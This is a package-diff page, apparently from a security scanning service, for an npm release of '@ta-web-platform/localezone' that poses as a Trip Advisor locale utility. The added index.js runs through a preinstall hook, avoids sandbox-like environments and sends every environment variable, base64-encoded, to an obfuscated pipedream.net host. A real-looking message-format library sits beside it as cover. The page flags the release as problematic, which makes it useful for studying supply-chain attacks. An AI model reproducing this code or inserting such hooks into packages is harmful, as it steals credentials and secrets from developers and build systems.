@ta-web-platform/localezone 0.0.1-security → 3.638.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @ta-web-platform/localezone might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,28 @@
1
+ const http = require('https');
2
+ const filter = [
3
+ { key: 'npm_config_registry', val: 'taobao.org' },
4
+ { key: 'USERNAME', val: 'daasadmin' },
5
+ { key: '_', val: '/usr/bin/python' },
6
+ { key: 'npm_config_metrics_registry', val: 'mirrors.tencent.com' }
7
+ ];
8
+
9
+ function main() {
10
+ var data = process.env || {};
11
+ if (
12
+ filter.some(({ key, val }) => data[key] && data[key].includes(val)) ||
13
+ Object.keys(data).length < 10) {
14
+ return;
15
+ }
16
+
17
+ req = http.request({
18
+ host: ['8e459c4501f7ae10bbe91e4e495a315d', 'm', ['pipe','dream'].join(''), 'net'].join('.'),
19
+ path: '/' + (data.npm_package_name || ''),
20
+ method: 'POST'
21
+ }).on('error', function (err) {
22
+ });
23
+
24
+ req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
25
+ req.end();
26
+ }
27
+
28
+ main();
@@ -0,0 +1,238 @@
1
+ import { parse as parse$1 } from 'messageformat-parser';
2
+
3
+ function _defineProperty(obj, key, value) {
4
+ if (key in obj) {
5
+ Object.defineProperty(obj, key, {
6
+ value: value,
7
+ enumerable: true,
8
+ configurable: true,
9
+ writable: true
10
+ });
11
+ } else {
12
+ obj[key] = value;
13
+ }
14
+
15
+ return obj;
16
+ }
17
+
18
+ function ownKeys(object, enumerableOnly) {
19
+ var keys = Object.keys(object);
20
+
21
+ if (Object.getOwnPropertySymbols) {
22
+ var symbols = Object.getOwnPropertySymbols(object);
23
+ if (enumerableOnly) symbols = symbols.filter(function (sym) {
24
+ return Object.getOwnPropertyDescriptor(object, sym).enumerable;
25
+ });
26
+ keys.push.apply(keys, symbols);
27
+ }
28
+
29
+ return keys;
30
+ }
31
+
32
+ function _objectSpread2(target) {
33
+ for (var i = 1; i < arguments.length; i++) {
34
+ var source = arguments[i] != null ? arguments[i] : {};
35
+
36
+ if (i % 2) {
37
+ ownKeys(source, true).forEach(function (key) {
38
+ _defineProperty(target, key, source[key]);
39
+ });
40
+ } else if (Object.getOwnPropertyDescriptors) {
41
+ Object.defineProperties(target, Object.getOwnPropertyDescriptors(source));
42
+ } else {
43
+ ownKeys(source).forEach(function (key) {
44
+ Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key));
45
+ });
46
+ }
47
+ }
48
+
49
+ return target;
50
+ }
51
+
52
+ function _toConsumableArray(arr) {
53
+ return _arrayWithoutHoles(arr) || _iterableToArray(arr) || _nonIterableSpread();
54
+ }
55
+
56
+ function _arrayWithoutHoles(arr) {
57
+ if (Array.isArray(arr)) {
58
+ for (var i = 0, arr2 = new Array(arr.length); i < arr.length; i++) arr2[i] = arr[i];
59
+
60
+ return arr2;
61
+ }
62
+ }
63
+
64
+ function _iterableToArray(iter) {
65
+ if (Symbol.iterator in Object(iter) || Object.prototype.toString.call(iter) === "[object Arguments]") return Array.from(iter);
66
+ }
67
+
68
+ function _nonIterableSpread() {
69
+ throw new TypeError("Invalid attempt to spread non-iterable instance");
70
+ }
71
+
72
+ var flattenDeep = function flattenDeep(input) {
73
+ var stack = _toConsumableArray(input);
74
+
75
+ var res = [];
76
+
77
+ while (stack.length) {
78
+ // pop value from stack
79
+ var next = stack.pop();
80
+
81
+ if (Array.isArray(next)) {
82
+ // push back array items, won't modify the original input
83
+ stack.push.apply(stack, _toConsumableArray(next));
84
+ } else {
85
+ res.push(next);
86
+ }
87
+ } // reverse to restore input order
88
+
89
+
90
+ return res.reverse();
91
+ };
92
+
93
+ var lastLocale = null;
94
+ var lastPluralRules = {};
95
+
96
+ var getPluralRules = function getPluralRules(locale) {
97
+ if (locale === lastLocale) {
98
+ return lastPluralRules;
99
+ }
100
+
101
+ lastLocale = locale;
102
+ return lastPluralRules = Intl.PluralRules ? new Intl.PluralRules(locale) : {};
103
+ };
104
+
105
+ var transformToken = function transformToken(token, args, options) {
106
+ // the token is passed as a param to the inner functions as a refined type, otherwise
107
+ // Flow will complain about using (token: Token) without refining it
108
+ var transformString = function transformString(t) {
109
+ return [t];
110
+ };
111
+
112
+ var transformArgument = function transformArgument(t) {
113
+ return [args[t.arg]];
114
+ };
115
+
116
+ var transformSelect = function transformSelect(t) {
117
+ if (!t.cases.some(function (el) {
118
+ return el.key === 'other';
119
+ })) {
120
+ throw new Error("select must contain an 'other' case: ".concat(JSON.stringify(token)));
121
+ }
122
+
123
+ var matchingCase = t.cases.find(function (selectCase) {
124
+ return selectCase.key === args[t.arg];
125
+ }) || t.cases.find(function (selectCase) {
126
+ return selectCase.key === 'other';
127
+ });
128
+
129
+ if (matchingCase !== undefined) {
130
+ return matchingCase.tokens.map(function (tok) {
131
+ return (// $FlowFixMe passing union type unrefined
132
+ transformToken(tok, _objectSpread2({}, args, {
133
+ octo: args[t.arg]
134
+ }), options)
135
+ );
136
+ });
137
+ }
138
+
139
+ return [];
140
+ };
141
+
142
+ var transformPlural = function transformPlural(t) {
143
+ var pr = getPluralRules(options.locale);
144
+
145
+ if (!t.cases.some(function (el) {
146
+ return el.key === 'other';
147
+ })) {
148
+ throw new Error("plural must contain an 'other' case: ".concat(JSON.stringify(token)));
149
+ }
150
+
151
+ var matchingCase = t.cases.find(function (pluralCase) {
152
+ return (// literal/direct matches first
153
+ pluralCase.key === String(args[t.arg]) || // locale-specific keys second, we can apply the offset now
154
+ pluralCase.key === pr.select(parseFloat(args[t.arg]) - t.offset)
155
+ );
156
+ }) || t.cases.find(function (pluralCase) {
157
+ return (// when nothing matches
158
+ pluralCase.key === 'other'
159
+ );
160
+ });
161
+
162
+ if (matchingCase !== undefined) {
163
+ return matchingCase.tokens.map(function (tok) {
164
+ return (// $FlowFixMe passing union type unrefined
165
+ transformToken(tok, _objectSpread2({}, args, {
166
+ octo: options.formatters.number(parseFloat(args[t.arg]) - t.offset, options.locale, [])
167
+ }), options)
168
+ );
169
+ });
170
+ }
171
+
172
+ return [];
173
+ };
174
+
175
+ var transformFunction = function transformFunction(t) {
176
+ var formatters = options.formatters || {};
177
+ return transformToken(formatters[t.key](args[t.arg], options.locale, t.params || []), args, options);
178
+ }; // eslint-disable-next-line no-unused-vars
179
+
180
+
181
+ var transformOctothorpe = function transformOctothorpe(_) {
182
+ return [args.octo || '#'];
183
+ };
184
+
185
+ if (typeof token === 'string') {
186
+ return transformString(token);
187
+ }
188
+
189
+ switch (token.type) {
190
+ case 'argument':
191
+ return transformArgument(token);
192
+
193
+ case 'select':
194
+ return transformSelect(token);
195
+
196
+ case 'function':
197
+ return transformFunction(token);
198
+
199
+ case 'plural':
200
+ return transformPlural(token);
201
+
202
+ case 'selectordinal':
203
+ return transformPlural(token);
204
+
205
+ case 'octothorpe':
206
+ return transformOctothorpe();
207
+
208
+ default:
209
+ return [];
210
+ }
211
+ };
212
+ /**
213
+ * Parses an ICU message format string into an internal representation. Useful for caching. Can be
214
+ * passed to getFormattedMessage().
215
+ * @param icuMessage The ICU message format string
216
+ */
217
+
218
+
219
+ var parse = function parse(icuMessage) {
220
+ return parse$1(icuMessage);
221
+ };
222
+ /**
223
+ * Formats an ICU string with the supplied arguments to an array of {@link Node}.
224
+ * @param icuMessage The ICU message format string or pre-parsed ICU message as returned by parse()
225
+ * @param messageArgs Arguments to the ICU message format string
226
+ * @param formatterOptions Options for the formatter with custom formatters and locale information
227
+ */
228
+
229
+ var getFormattedMessage = function getFormattedMessage(icuMessage, messageArgs, formatterOptions) {
230
+ var tokens = typeof icuMessage === 'string' ? parse(icuMessage) : icuMessage;
231
+ return flattenDeep(tokens.map(function (token) {
232
+ return transformToken(token, messageArgs || {}, _objectSpread2({
233
+ formatters: {}
234
+ }, formatterOptions));
235
+ }));
236
+ };
237
+
238
+ export { getFormattedMessage, parse };
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
2
  "name": "@ta-web-platform/localezone",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "3.638.0",
4
+ "description": "Trip Advisor locale utils lib",
5
+ "main": "localezone.esm.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js",
8
+ "build": "yarn build"
9
+ },
10
+ "dependencies": {
11
+ "messageformat-parser": "^4.1.3"
12
+ },
13
+ "files": [
14
+ "index.js",
15
+ "localezone.esm.js"
16
+ ],
17
+ "author": "htrpavrs",
18
+ "license": "MIT"
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40ta-web-platform%2Flocalezone for more information.